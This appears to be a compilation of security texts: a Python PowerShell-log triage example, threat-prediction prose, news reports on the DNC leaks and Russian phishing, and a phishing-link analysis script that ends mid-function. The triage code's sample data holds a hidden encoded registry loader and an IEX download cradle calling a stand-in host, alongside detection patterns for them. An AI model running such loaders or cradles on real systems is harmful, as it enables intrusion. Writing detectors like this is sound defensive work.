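What an ephemeral, registry-fed PowerShell stage leaves behind is the command line and the script block text at the moment it runs, so the practical check is to enable Script Block Logging (PowerShell 5.0 and later; event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and process-creation auditing, and to triage those records. The following Python is an added example, not code from the original article or from any vendor: it decodes -EncodedCommand payloads (base64 over UTF-16LE text) and scores the decoded text against a small indicator list. The three events, the registry path, the indicator weights and the alert threshold are all constructed for the example.

```python
"""Triage of PowerShell command lines and script blocks (added example)."""
from __future__ import annotations

import base64
import re

# --- Indicators: regexes over the visible plus decoded text ----------------
# Weights and threshold are assumptions for this example, not a vendor's.
INDICATORS: dict[str, tuple[re.Pattern, int]] = {
    "encoded_command": (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), 2),
    "hidden_window": (re.compile(r"-(?:w|win|windowstyle)\s+hidden\b", re.I), 2),
    "noprofile_bypass": (re.compile(r"-(?:nop|noprofile)\b|-(?:ep|executionpolicy)\s+bypass", re.I), 1),
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 3),
    "base64_decode": (re.compile(r"FromBase64String", re.I), 2),
    "registry_read": (re.compile(r"Get-ItemProperty[^\n]*HK(?:CU|LM)", re.I), 3),
    "download_cradle": (re.compile(r"DownloadString|Net\.WebClient|Invoke-WebRequest|\bIWR\b", re.I), 3),
    "reflective_load": (re.compile(r"Reflection\.Assembly\]::Load|VirtualAlloc|WriteProcessMemory", re.I), 3),
}
ALERT_THRESHOLD = 5

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def encode_command(script: str) -> str:
    """How -EncodedCommand is produced: base64 over UTF-16LE text.
    Used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text: str) -> str | None:
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_text(text: str) -> tuple[int, list[str]]:
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[h][1] for h in hits), hits


def triage_event(event: dict) -> dict:
    """Score one event on its visible text plus any decoded payload."""
    visible = event["text"]
    decoded = decode_encoded_command(visible)
    score, hits = score_text(visible if decoded is None else visible + "\n" + decoded)
    return {"id": event["id"], "score": score, "indicators": hits,
            "decoded": decoded, "alert": score >= ALERT_THRESHOLD}


# --- Constructed sample events (not real log exports) ----------------------
# A registry-resident stage: the autorun command line carries only a tiny
# encoded loader; the real payload sits in a hypothetical registry value.
REG_PAYLOAD = ("$d=(Get-ItemProperty -Path 'HKCU:\\Software\\Example\\Stage' -Name Blob).Blob;"
               "IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($d)))")
SAMPLE_EVENTS = [
    {"id": "proc-1", "source": "process_creation",
     "text": "powershell.exe -nop -w hidden -enc " + encode_command(REG_PAYLOAD)},
    {"id": "sb-2", "source": "scriptblock_4104",
     "text": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"},
    {"id": "sb-3", "source": "scriptblock_4104",
     "text": "$c=New-Object Net.WebClient;IEX $c.DownloadString('http://cdn.example/s')"},
]


def run_triage(events: list[dict] = SAMPLE_EVENTS) -> list[dict]:
    return [triage_event(e) for e in events]


if __name__ == "__main__":
    for f in run_triage():
        flag = "ALERT" if f["alert"] else "ok   "
        print(f"{flag} {f['id']:8} score={f['score']:2} {f['indicators']}")
```

Without the decode step the first event scores only on its flags; the registry read and the IEX are invisible until the UTF-16LE payload is unpacked, which is why command-line-only matching misses this class of loader. Script Block Logging is enabled by policy at HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging (EnableScriptBlockLogging = 1), and its 4104 events record the script text after the decoding, so once it is on the registry-read pattern shows up in plain text.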

Ephemeral infections will highlight the need for proactive and sophisticated heuristics in advanced anti-malware solutions (see: System Watcher).

Espionage goes mobile

Multiple threat actors have employed mobile implants in the past, including Sofacy, RedOctober and CloudAtlas, as well as customers of HackingTeam and the suspected NSO Pegasus iOS malware suite. However, these have supplemented campaigns largely based on desktop toolkits.

As enthusiasm for desktop operating systems wanes, and as more of the average user's digital life is effectively transferred to their pockets, we expect to see the rise of primarily mobile espionage campaigns.

These will surely benefit from decreased attention and the difficulty of attaining forensic tools for the latest mobile operating systems.

Reliance on code signing and integrity checks has limited the visibility available to security researchers in the mobile arena, but this won't dissuade determined and well-resourced attackers from hunting their targets in this space.

The future of financial attacks

We heard you'd like to rob a bank…

The announcement of this year's attacks on the SWIFT network caused uproar throughout the financial services industry due to its sheer daring, measured in zeros and commas to the tune of multi-million dollar heists.

This move was a natural evolution for players like the Carbanak gang and perhaps other interesting threat actors. However, these cases remain the work of APT-style actors with a certain panache and established capability.
Surely, they're not the only ones interested in robbing a bank for sizable funds? As cybercriminal interest grows, we expect to see the rise of SWIFT-heist middlemen in the well-established underground scheme of tiered criminal enterprises. Performing one of these heists requires initial access, specialized software, patience, and, eventually, a money laundering scheme.

Each of these steps has a place for already established criminals to provide their services at a fee, with the missing piece being the specialized malware for performing SWIFT attacks. We expect to see the commodification of these attacks through specialized resources being offered for sale in underground forums or through as-a-service schemes.

Resilient payment systems

As payment systems became increasingly popular and widely adopted, we expected to see greater criminal interest in them. However, it appears that implementations have proven particularly resilient, and no major attacks have been noted at this time.

This relief for the consumer may, however, entail a headache for the payment system providers themselves, as cybercriminals are wont to target the latter through direct attacks on the payment system infrastructure. Whether these attacks result in direct financial losses or simply outages and disruption, we expect increased adoption to attract more nefarious attention.

Dirty, lying ransomware

As much as we all hate ransomware (and with good reason), most ransomware thrives on the benefit of an unlikely trust relationship between the victim and their attacker.

This criminal ecosystem relies on the tenet that the attacker will abide by a tacit contract with the victim that, once payment is received, the ransomed files will be returned.

Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling this promise, and this has allowed the ecosystem to thrive. However, as ransomware's popularity continues to rise and a lesser grade of criminal enters the space, we are likely to encounter more and more 'ransomware' that lacks the quality assurance or general coding capability to actually uphold this promise. We expect 'skiddie' ransomware to lock away files or system access, or simply delete the files, trick the victim into paying the ransom, and provide nothing in return.

At that point, little will distinguish ransomware from wiping attacks and we expect the ransomware ecosystem to feel the effects of a ‘crisis of confidence’.

This may not deter larger, more professional outfits from continuing their extortion campaigns, but it may galvanize forces against the rising ransomware epidemic into abandoning the idea that 'just pay the ransom' is viable advice for victims.

The big red button

The famous Stuxnet may have opened a Pandora's Box by realizing the potential for targeting industrial systems, but it was carefully designed with a watchful eye towards prolonged sabotage on very specific targets.

Even as the infection spread globally, checks on the payload limited collateral damage and no industrial Armageddon came to pass.
Since then, however, any rumor or report of an industrial accident or unexplained explosion serves as a peg to pin a cyber-sabotage theory on. That said, a cyber-sabotage induced industrial accident is certainly not beyond the realm of possibility.

As critical infrastructure and manufacturing systems continue to remain connected to the internet, often with little or no protection, these tantalizing targets are bound to whet the appetite of well-resourced attackers looking to cause mayhem.
It’s important to note that, alarmism aside, these attacks are likely to require certain skills and intent.

An unfolding cyber-sabotage attack is likely to come hand-in-hand with rising geopolitical tensions and well-established threat actors intent on targeted destruction or the disruption of essential services.

The overcrowded internet bites back

A brick by any other name

Long have we prophesied that the weak security of the Internet of Things (or Threats) will come back to bite us, and behold, the day is here.

As the Mirai botnet showcased recently, weak security in needlessly internet-enabled devices provides an opportunity for miscreants to cause mayhem with little or no accountability. While this is no surprise to infosec aficionados, the next step may prove particularly interesting, as we predict vigilante hackers may take matters into their own hands. The notion of patching known and reported vulnerabilities holds a certain sacrosanct stature as validation for the hard (and often uncompensated) work of security researchers.

As IoT-device manufacturers continue to pump out unsecured devices that cause wide-scale problems, vigilante hackers are likely to take matters into their own hands.

And what better way than to return the headache to the manufacturers themselves by mass bricking these vulnerable devices? As IoT botnets continue to cause DDoS and spam distribution headaches, the ecosystem’s immune response may very well take to disabling these devices altogether, to the chagrin of consumers and manufacturers alike.

The Internet of Bricks may very well be upon us.

The silent blinky boxes

The shocking release of the ShadowBrokers dump included a wealth of working exploits for multiple major manufacturers' firewalls. Reports of exploitation in the wild followed not long after, as the manufacturers scrambled to understand the vulnerabilities exploited and issue patches. However, the extent of the fallout has yet to be accounted for. What were attackers able to gain with these exploits on hand? What sort of implants may lie dormant in vulnerable devices? Looking beyond these particular exploits (and keeping in mind the late-2015 discovery of a backdoor in Juniper's ScreenOS), there is a larger issue of device integrity that bears further research when it comes to appliances critical to enterprise perimeters. In practice that means treating the perimeter appliance as in scope for verification rather than as a trusted black box: checking running firmware against the vendor's published hashes, diffing the configuration against a known-good baseline, and watching for connections that originate from the device itself.

The open question remains: 'who's your firewall working for?'

Who the hell are you?

The topics of False Flags and PsyOps are particular favorites of ours and, to no surprise, we foresee the expansion of several trends in that vein…

Information warfare

The creation of fake outlets for targeted dumps and extortion was pioneered by threat actors like Lazarus and Sofacy.

After their somewhat successful and highly notorious use in the past few months, we expect information warfare operations to increase in popularity for the sake of opinion manipulation and overall chaos around popular processes.

Threat actors interested in dumping hacked data have little to lose from crafting a narrative through an established or fabricated hacktivist group, diverting attention from the attack itself to the contents of their revelations. The true danger at that point is not hacking or the invasion of privacy, but rather that as journalists and concerned citizens become accustomed to accepting dumped data as newsworthy fact, they open the door to more cunning threat actors seeking to manipulate the outcome by means of data manipulation or omission.
Vulnerability to these information warfare operations is at an all-time high, and we hope discernment will prevail as the technique is adopted by more players (or by the same players with more throwaway masks).

The promise of deterrence

As cyberattacks come to play a greater role in international relations, attribution will become a central issue in determining the course of geopolitical overtures.

Governmental institutions have some difficult deliberating ahead to determine what standard of attribution will prove enough for demarches or public indictments.

As precise attribution is almost impossible with the fragmented visibility of different public and private institutions, it may be the case that 'loose attribution' will be considered good enough for these. While advising extreme caution is important, we must also keep in mind that there is a very real need for consequences to enter the space of cyberattacks. Our bigger issue is making sure that retaliation doesn't engender further problems as cunning threat actors outsmart those seeking to do attribution in the first place.

We must also keep in mind that as retaliation and consequences become more likely, we'll see the abuse of open-source and commercial malware begin to increase sharply, with tools like Cobalt Strike and Metasploit providing a cover of plausible deniability that doesn't exist with closed-source proprietary malware.

Doubling-down on False Flags

While the examples reported in the False Flags report included in-the-wild cases of APTs employing false flag elements, no true, pure false flag operation has been witnessed at this time.

By that we mean an operation by Threat Actor-A carefully and entirely crafted in the style and with the resources of another, ‘Threat Actor-B’, with the intent of inciting tertiary retaliation by the victim against the blameless Threat Actor-B. While it’s entirely possible that researchers have simply not caught onto this already happening, these sorts of operations won’t make sense until retribution for cyberattacks becomes a de facto effect.

As retaliation (be it overtures, sanctions, or retaliatory CNE, computer network exploitation) becomes more common and impulsive, expect true false flag operations to enter the picture. As this becomes the case, we can expect false flags to be worth even greater investment, perhaps even inciting the dumping of infrastructure or even jealously guarded proprietary toolkits for mass use.
In this way, cunning threat actors may cause a momentary overwhelming confusion of researchers and defenders alike, as script kiddies, hacktivists, and cybercriminals are suddenly capable of operating with the proprietary tools of an advanced threat actor, thus providing a cover of anonymity in a mass of attacks and partially crippling the attribution capabilities of an enforcing body.

What privacy?

Pulling the veil

There's great value to be found in removing what vestiges of anonymity remain in cyberspace, whether for the sake of advertisers or spies.

For the former, tracking with persistent cookies has proven a valuable technique.

This is likely to expand further and be combined with widgets and other innocuous additions to common websites that allow companies to track individual users as they make their way beyond a particular domain, and thus compile a cohesive view of their browsing habits (more on this below).

In other parts of the world, the targeting of activists and the tracking of social media activities that 'incite instability' will continue to inspire surprising sophistication, as deep pockets continue to stumble into curiously well-placed, previously unheard-of companies with novelties for tracking dissidents and activists through the depth and breadth of the internet.

These activities tend to have a great interest in the social networking tendencies of entire geographic regions and how they're affected by dissident voices. Perhaps we'll even see an actor so daring as to break into a social network for a goldmine of PII and incriminating information.

The espionage ad network

No pervasive technology is more capable of enabling truly targeted attacks than ad networks.

Their placement is already entirely financially motivated and there is little or no regulation, as evidenced by recurring malvertising attacks on major sites.

By their very nature, ad networks provide excellent target profiling through a combination of IPs, browser fingerprinting, and browsing interest and login selectivity.

This kind of user data allows a discriminating attacker to selectively inject or redirect specific victims to their payloads, and thus largely avoid both collateral infections and the persistent availability of payloads that tends to pique the interest of security researchers.

As such, we expect the most advanced cyberespionage actors to find the creation or co-opting of an ad network to be a small investment for sizable operational returns, hitting their targets while protecting their latest toolkits.

The rise of the vigilante hacker

Following his indiscriminate release of the HackingTeam dump in 2015, the mysterious Phineas Fisher released his guide for aspiring hackers to take down unjust organizations and shady companies.

This speaks to a latent sentiment that the asymmetrical power of the vigilante hacker is a force for good, despite the fact that the HackingTeam dump provided live zero-days to active APT teams and perhaps even encouragement for new and eager customers.

As conspiratorial rhetoric increases around this election cycle, fuelled by the belief that data leaks and dumps are the way to tip the balance of information asymmetry, more will enter the space of vigilante hacking for data dumps and orchestrated leaks against vulnerable organizations.
Since June, some entity has been releasing e-mails and electronic documents obtained via network intrusions and credential thefts from politicians and political party employees. Some of the releases have appeared on sites believed to be associated with Russian intelligence operations; others have appeared on WikiLeaks. On occasion, the leaker has also engaged journalists directly, trying to have them publish information drawn from these documents, sometimes successfully, other times not.

The US government has pinned at least some of the blame for these leaks on Russia. This has led some observers to argue that WikiLeaks and Russian intelligence agencies are "weaponizing" the media. This is what national security circles refer to as an "influence operation," using reporters as tools to give credibility and cover to a narrative driven by another nation-state. The argument is that by willingly accepting leaked data, journalists have (wittingly or not) aided the leaker's cause. As such, they have become an "agent of influence."

The Grugq, a veteran information security researcher who has specialized in counterintelligence research and a former employee of the computer security consulting company @stake, penned an article about the topic yesterday. "The primary role for an agent of influence," he wrote, "is to add credibility to the narrative/data that the agency is attempting to get out and help influence the public." Such agents might be friendly with or controlled by the agency trying to spread the information, but they can also be unwitting accomplices, "sometimes called a 'useful idiot,' unaware of their role as conduits of data for an agency."

The actual impact of the leaked information on the US presidential election may not matter to an influence operation.
The intended target of the campaign being waged through the WikiLeaks dumps, Guccifer 2.0, and DCLeaks is likely a larger public, perhaps including citizens in Russia itself and the people and decision-makers of the bordering nations. As Ars previously reported, the attacks on the Democratic National Committee (DNC) and on the US political process may be tied to a Russian effort to "contain" US foreign policy efforts and undermine confidence among the citizens of eastern European NATO members. The continued dumping of documents, and the chaos it creates for the US political process, shows the world that Russia can act upon the US at a distance. Therefore, Russia can also project power much closer to home.

Assuming this attribution and analysis is in some broad sense accurate, this raises a question: what's a journalist to do with these sorts of hacks and leaks? Has everyone who draws on them become an unwitting "agent of influence?" And if so, is that actually a bad thing if the leaks are newsworthy?

Ethics in information warfare journalism

Dealing with a source's motivations is not a new problem for the press. Journalists get used all the time (just as they sometimes "use" their sources; it's part of the circle of life for investigative reporting).

"The decision about whether or not to publish has always been about whether or not it's in the public interest, and also, I think, about what's the motivation or intention [of the source]," Jeremy Rue, acting dean of academics for the University of California at Berkeley's Graduate School of Journalism, told Ars. "Often journalists are so eager to get information, they don't take the time to ask what the motivation is behind this source," Rue said. "I think those motivations are important to factor in. Whether or not it changes the choice to publish, I don't really want to take a specific stand on that. It's a very complex issue and it keeps coming up in newsrooms. But I do definitely feel strongly that you should absolutely weigh all the different factors, like what are the motivations of your source."

Glenn Greenwald of The Intercept has vocally disagreed with the idea that the source's intentions are material to a reporter's job, particularly in the case of publishing WikiLeaks' recent dumps. To him, if it's news, it should be reported, regardless of source and motivation. In a recent article, Greenwald wrote as much:

Some have been arguing that because these hacks were engineered by the Russian government with the goal of electing Trump or at least interfering in US elections, journalists should not aid this malevolent scheme by reporting on the material. Leaving aside the fact that there is no evidence (just unproven US government assertions) that the Russian government is behind these hacks, the motive of a source is utterly irrelevant in the decision-making process about whether to publish.

While nothing in the public domain explicitly links the Russian government to the overall operation, there's at least some suggestive public evidence of Russia's involvement with Guccifer 2.0, who gave Greenwald exclusive access to some of the breach content, and with the DCLeaks "American hacktivist" site. That evidence includes both analysis by security experts of the initial Guccifer 2.0 document dump and an investigation by The Smoking Gun in August, which was triggered by Guccifer 2.0 reaching out directly to the site.

For The Grugq, the way Greenwald has interacted with Guccifer 2.0 looks like a perfect example of how an influence operation works. "The Intercept was given 'exclusive' access to e-mails obtained by the entity known as Guccifer 2.0," he wrote. "The Intercept was both aware that the e-mails were from Guccifer 2.0, that Guccifer 2.0 has been attributed to Russian intelligence services, and that there is significant public evidence supporting this attribution."

For a site like Wikileaks, the questions extend further.
Assuming that it's right to publish material regardless of the source's motivations, how much of that material is fair game? The Investigative Reporter's Handbook frames the decision this way:

When exposing private behaviors of public figures a reporter must make sure there is a need for the public to know this information. If there is not then a reporter should not report on it. If the behavior does not affect the figure's public performance then there is no need to report on it.

Naomi Klein, speaking on Glenn Greenwald's podcast this week, said something similar when talking about WikiLeaks:

They're very clearly looking for maximum media attention and you can tell that just by looking at the WikiLeaks Twitter feed and at how they are timing it right before the debates... These leaks are not, in my opinion, in the same category as the Pentagon Papers or previous WikiLeaks releases like the trade documents they continue to leak, which I am tremendously grateful for, because those are government documents that we have a right to, that are central to democracy. There are many things in that category. But personal e-mails—and there's all kinds of personal stuff in these e-mails—this sort of indiscriminate dump is precisely what Snowden was trying to protect us from.

For Wikileaks, of course, it's all fair game in the name of radical transparency.

Between Scylla and Charybdis

While there were certainly influence operations in the pre-Internet era, data breaches and digital media (including social media) have made them more accessible even to non-state actors. The "Climategate" incident, in which a collection of e-mails from the Climate Research Unit at the University of East Anglia was leaked in an attempt to sow doubt about scientists' consensus on climate change, is an example of selective publication of information to create controversy and political ammunition. So is the recent "Panama Papers" leak (which the Russian government has suggested was a US information operation). But if the DNC leaks and the wave of other breaches of political figures' e-mails have been an influence operation, they have operated at a much larger scale with much broader ambitions.

There's enough to be concerned about ethically when it comes to accurate leaked data being provided by someone running an intentional influence campaign. But things get more complicated when false information is introduced into leaks. While WikiLeaks claims "a 100 percent accuracy rate" for its leaked documents, materials provided by Guccifer 2.0 showed signs of alteration. The entity behind Guccifer 2.0 claimed that one document was a file classified Secret and taken from the computer Hillary Clinton used at the State Department. But the document, which was actually an Obama transition team memorandum from before Clinton was even a nominee for Secretary of State, had been modified to include "Secret" in the document's header.

This is the sort of thing that Jack Goldsmith, a former Department of Justice official, warned about at a recent seminar at Yale University. "Theft and publication of truthful information is small beans—what about theft and publication of faked information, which is hard to verify, or tampering with the vote itself?" Goldsmith said. "That could have huge consequences, the number of actors who could do this are many, and our ability to defend against it is uncertain."

That places journalists trying to use the documents from these dumps in a very tight spot, trying to both determine the veracity of content they've obtained and decide its newsworthiness. Yes, journalists have been used for propaganda purposes before. Journalists are used by politicians and government agencies every day to put out information to shape perception.
Wikileaks' dumps of the Podesta e-mails and other Democratic Party documents show, among other things, how journalists both use and are used by their sources, ingratiating themselves to get access. But this is the first time a foreign government's agent has used the combination of network infiltration, data theft, and public leaking of that data to the press and the world to affect another country's election, and the perception of that other country's election in areas of the world.

Scott E. DePasquale, Senior Fellow at the Atlantic Council's Brent Scowcroft Center for International Security and Chairman & CEO of Utilidata, suggests that Wikileaks' decisions have made it a classic agent of influence. "We can divorce ourselves from whether Russia has actually paid the bills [for WikiLeaks] with no questions and no doubts that Assange knows he is doing benefit to Russia," he said. "Whether we get down to if they're on the Russian payroll, is it a deeply covert intelligence operation or something like that—all of that aside, because I think those are impossible questions to answer and even shed light on in an unclassified domain—it is without a doubt that Assange knows what he is doing is benefiting Russia. Whether he's doing it out of spite for the US as a political activist, or he is using the Russians... whatever the modality is, he knows very well that his interest and Putin's interest are deeply aligned. And that's deeply troubling for us at the end of the day."

The worries don't even end with the first reporters to hit publish. Questions linger even for more traditional journalists who use only small bits of the most newsworthy leaked material. "There's the complicitness of serving this role of disseminating news for a state actor like Russia," said Rue. "I think that is a factor that should be part of the equation of whether or not to decide to publish something."

A reporter or news organization may still decide that it's worth it to run with the material even if they believe that it's been provided by Russia "trying to embarrass the Clinton campaign," Rue acknowledged. But "you have to consider that as part of the equation to publish." The ethical decisions journalists now make about how they interact with that data are much more complicated as a result. And because of the impact of this particular influence operation, this approach may well become the norm, with more countries seeking to expose each other's secrets using journalists as their proxies.
The Office of the Director of National Intelligence and the Department of Homeland Security today jointly charged that the Russian government was responsible for directing a series of intrusions into the networks of US political organizations and state election boards.
In a “joint security statement,” officials from the two agencies declared they were “confident” that the government of President Vladimir Putin was behind the hacks and the publication of data obtained from them—some of it doctored—specifically to impact the results of the upcoming US elections. In the statement, agency officials asserted the following:

The U.S. Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations. The recent disclosures of alleged hacked e-mails on sites like DCLeaks.com and WikiLeaks and by the Guccifer 2.0 online persona are consistent with the methods and motivations of Russian-directed efforts. These thefts and disclosures are intended to interfere with the US election process.

The officials also accused Russia of being behind attacks on some state election board systems. This type of interference, DHS and ODNI officials noted, is “not new to Moscow—the Russians have used similar tactics and techniques across Europe and Eurasia, for example, to influence public opinion there.” And they dismissed any contention that the attacks came from independent actors within Russia or at the direction of lower-level intelligence operatives, stating, “We believe, based on the scope and sensitivity of these efforts, that only Russia's senior-most officials could have authorized these activities.”

There has been ample documentation of past efforts by groups of actors within the Russian Federation to shape public opinion elsewhere, just as there is documentation of Russia’s overall doctrine for conducting information warfare against adversaries outside the bounds of actual war.

An investigation by Adrian Chen for the New York Times Magazine published in 2015 documented how a Russia-based “Internet Research Agency” created fake Twitter profiles and posted misinformation on things ranging from fictional chemical plant accidents to Ebola hoaxes in various locations around the US.

The “agency” apparently hoped to spread panic and misinformation in order to undermine trust in US authorities.

And in other information operations, the Russian government has sought to shape opinion throughout Europe while quashing dissent at home. In a speech at the beginning of an Atlantic Council event in Berlin last year, US Ambassador to Germany John Emerson described Russia’s larger disinformation campaign, saying:

The Russian government and the media that it controls are trying to prevent the publication of information that doesn’t conform to Russia's aims and are manipulating the presentation of information to cloak Russia’s actions.

The Kremlin’s disinformation campaign goes far beyond controlling its own media. It is aimed at nothing less than presenting a parallel version of reality and disseminating it as if it were news.

The Kremlin’s goal is to make people question the value of media at all; to reject the idea of an absolute truth; and to persuade the public that “reality” is relative...

This campaign of obfuscation has become all too familiar since the occupation of Crimea.

Emerson noted that some have described Russia’s information warfare model as the “4D” approach: dismiss factual reports, distort the truth with planted information, distract from actions by generating counter-narratives, and dismay those who fail to accept the Russian view with threats of reprisal. The efforts by Guccifer 2.0 and DCLeaks appear to be aimed at distorting and distracting the American public as elections approach to gain some sort of advantage in its outcome.

But ODNI and DHS officials offered assurances that there was little chance Russia could directly affect the election by hacking voting systems themselves.
In a joint statement, officials said:

The USIC and the Department of Homeland Security (DHS) assess that it would be extremely difficult for someone, including a nation-state actor, to alter actual ballot counts or election results by cyber attack or intrusion.

This assessment is based on the decentralized nature of our election system in this country and the number of protections state and local election officials have in place. States ensure that voting machines are not connected to the Internet, and there are numerous checks and balances as well as extensive oversight at multiple levels built into our election process.

Still, DHS is offering state officials assistance in improving the security of their systems, and several states have taken them up on the offer.

Through an Election Infrastructure Cybersecurity Working Group, “DHS is providing several services to state and local election officials to assist in their cybersecurity,” officials explained. “These services include cyber ‘hygiene’ scans of Internet-facing systems, risk and vulnerability assessments, information sharing about cyber incidents, and best practices for securing voter registration databases and addressing potential cyber threats.”

While DHS and ODNI are confident about the source of the hacks of the DNC and other organizations, the Justice Department shows no indication that it is ready to press a case against individuals in Russia as it did in the case of past intrusions blamed on China.

And beyond acknowledging Russia’s role, it’s not clear what sort of action the US can take in response.
In recent decades, we've seen some of the most secure servers in the world breached by black hats. Last month, the media was all abuzz about the Democratic National Committee email hack and subsequent Wikileaks dump, which revealed bias against Bernie Sanders.

Donald Trump even weighed in and said that he hoped Russia would continue to compromise American networks and further weaken Hillary Clinton, which is pretty intense.
Information warfare is more serious than ever, and governments and companies are on guard. Unfortunately, being vigilant just isn't cutting it.
In this feature, we'll spotlight the intrusions and leaks that caused serious damage, whether it be financial or informational.
(Image: An attendee at the first day of the Democratic National Convention protests the DNC's treatment of Bernie Sanders, as hinted at by e-mails exposed by an alleged Russian hack. Chip Somodevilla, Getty News Images)

The well-timed leak of e-mails from the Democratic National Committee, following a long-running breach of the DNC's network, is a masterful piece of information warfare.

The leak may only be the beginning of an effort to shape the US presidential election, or it may be a backup plan triggered by the exposure of the long-running breach.

But the hacking of the DNC and the direct targeting of Hillary Clinton are only parts of a much larger operation by Russia-based hackers who have breached a number of US government networks. Evidence collected by the security firm CrowdStrike and forensic work by Fidelis point to the breach being caused by two "threat groups" associated with Russian intelligence organizations.

A pair of reports published in June by SecureWorks suggests that the same threat groups conducted phishing campaigns against the e-mail addresses of the DNC.

The same attackers targeted the addresses of Clinton campaign staffers, political consultants, journalists, and current and former members of the military, among others. At a minimum, this suggests that the DNC breach was part of a larger intelligence collection operation.

The leaked data from the DNC breach, however, may have been intended to create chaos and uncertainty around the election.

But why would the Russian government open that can of worms? It's possible that this fits into a larger Russian strategy aimed at splintering NATO and countering what Russia has seen over the past decade as encroachment by the West on Russia's national interests. This sort of activity fits well into a larger picture of Russian state-sponsored and state-aligned information operations, including destructive cyber-attacks and intelligence collection.

And the forensic evidence from the DNC breach fits right in with other recent operations by Russian hackers against US targets.

Bear Facts

Two specific malware families tied to Russian hackers were identified in CrowdStrike's analysis of the DNC breach.

CrowdStrike identified them as "Fancy Bear" and "Cozy Bear." Fancy Bear is the malware family tied to "Operation Pawn Storm" and other recent breaches targeting members of the media, US and NATO allied military organizations, government agencies, embassies, and defense contractors, as well as Russian political dissidents and opposition political parties. The Fancy Bear/Pawn Storm attacks date back to 2004.

They were originally focused on NATO-connected military and government organizations.
In many cases, the attacks used a fake Outlook Web Access login page to collect a victim's login credentials. The other malware, Cozy Bear (aka CozyDuke), first emerged in 2011.

Cozy Bear was involved in network intrusions on the unclassified networks of the White House, the Joint Chiefs of Staff, and the State Department.

The JCS hack occurred, reportedly, via a spear phishing attack via e-mail.

The phishing was disguised as a communication from a financial institution commonly used by members of the military.

Also typically installed by a phishing attack, the Cozy Bear implant is a combination of remote access backdoor, keylogger, screenshot capturer, and password stealer.
It can also be used to remote-install other malware on the victim's Windows computer.
If Cozy Bear captures the right credentials, it can connect to other systems and spread laterally through a network.

As SecureWorks researchers investigated the latest iteration of the Pawn Storm malware in mid-2015, their analysis led to a set of domains, all registered with the same e-mail. One of those domains was a lookalike domain that spoofed a Google URL.

The domain was spotted by a researcher in a report from the phishing attack tracking site Phishtank.com.

The domain was associated with an IP address at a hosting service in Romania. "The phishing URL looked interesting because it was passing through a lot of parameters," said Tom Finney of SecureWorks.

Those parameters included a specific encoded Google account name. "At almost the same time that the Phishtank user submitted that URL, they also submitted a Bit.ly short link," Finney added. "So we opened that short link and saw it was directing to the original phishing URL."

(Image: The fake Google login page associated with the Bit.ly links used in the phishing campaign SecureWorks tracked. Phishtank.com)

Using Bit.ly's application programming interface (API), SecureWorks researchers were able to search for all the short links associated with the domain in question. "The short links were all connected to one user, and going from that one domain we had a whole heap of short links," Finney said. "Each resolved to having coded in them the e-mail address and account details of an individual—they were creating short links for each target." Tracking the generation of the URLs, Finney said that it became clear that the attackers were systematically accessing a list of e-mail addresses for a specific subset of targets on a daily basis. "In May and June [of 2015], when [the attackers] were creating these short links every day, it was quite industrial," he said, "suggesting there was quite an organization behind it—there were some significant resources being thrown at this. It gave me the impression looking at the data that someone was following a tasking, because you would have a day where they would target military attachés—say every mil attaché that they could find that was based in Ankara, for example, and the next day it would be military attachés in some other European country. It was very systematic in that respect."

Between October 2015 and May 2016, SecureWorks researchers analyzed a total of 8,909 Bitly links, targeting 3,907 Google accounts—some of them individual Gmail accounts and others associated with organizational Google Apps accounts.

A large portion of the links, identified by SecureWorks through open source searches, belonged to people who would have been of interest in regard to Russia’s military involvement in eastern Ukraine. "For example," the SecureWorks researchers wrote in a post, "the e-mail address targeted by the most phishing attempts (nine) was linked to a spokesperson for the Ukrainian prime minister. Other targets included individuals in political, military, and diplomatic positions in former Soviet states, as well as journalists, human rights organizations, and regional advocacy groups in Russia." Another large group of the Gmail accounts targeted were those of current and former US and allied military members.

That group included people who worked for defense contractors, US and European politicians and government employees, and authors and journalists.
Some of these were discovered through open source searches by SecureWorks because the addresses had been published somewhere on the Web and pulled into a database. However, a large portion of them were not found in an open search, suggesting they had been either harvested from other compromised accounts or had been found through some other breach.

Phishing for pols

But as the links continued to be generated, a new type of target emerged.

Between March and April of 2016, an analysis of the URLs showed the phishing URL was used in tailored versions for 108 e-mail addresses tied to the Clinton campaign's hillaryclinton.com Google Apps account.

Those addresses included the campaign's national political director, finance director, director of strategic communications, director of scheduling, director of travel, traveling press secretary, and travel coordinator. Of the 108 e-mail addresses, 42 were not "open source," suggesting they had been acquired from another intelligence source. There were also links created that targeted 16 DNC e-mail addresses, including two belonging to a DNC secretary-emeritus and one belonging to the communications director.

And 26 personal Gmail accounts tied to the DNC and Hillary for America, including Clinton's director of speechwriting and a deputy director of DNC Chair Debbie Wasserman Schultz, were also targeted. There's no direct evidence that these phishing attempts, four of which were apparently clicked on according to analysis of Bit.ly, were directly tied to the DNC breach.
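The per-target short-link analysis described above, as an added example in Python (not SecureWorks' or Bit.ly's code): given short links already resolved to their long URLs, it decodes the target address carried in each URL, tallies attempts per target and per organisation, and flags the lookalike host. The lookalike host name, the parameter name "e" and the URL-safe base64 encoding are constructed assumptions; the article only says the URL carried an encoded Google account name.

```python
"""Added example, not SecureWorks' or Bit.ly's code. Nothing is fetched
online: RESOLVED_LINKS is a constructed stand-in for short links that have
already been resolved to their long URLs. The host, the "e" parameter and
the base64 encoding of the target address are assumptions."""
import base64
import binascii
from collections import Counter
from typing import Optional
from urllib.parse import parse_qs, urlparse


def _enc(addr: str) -> str:
    """Helper used only to build the constructed sample (padding stripped)."""
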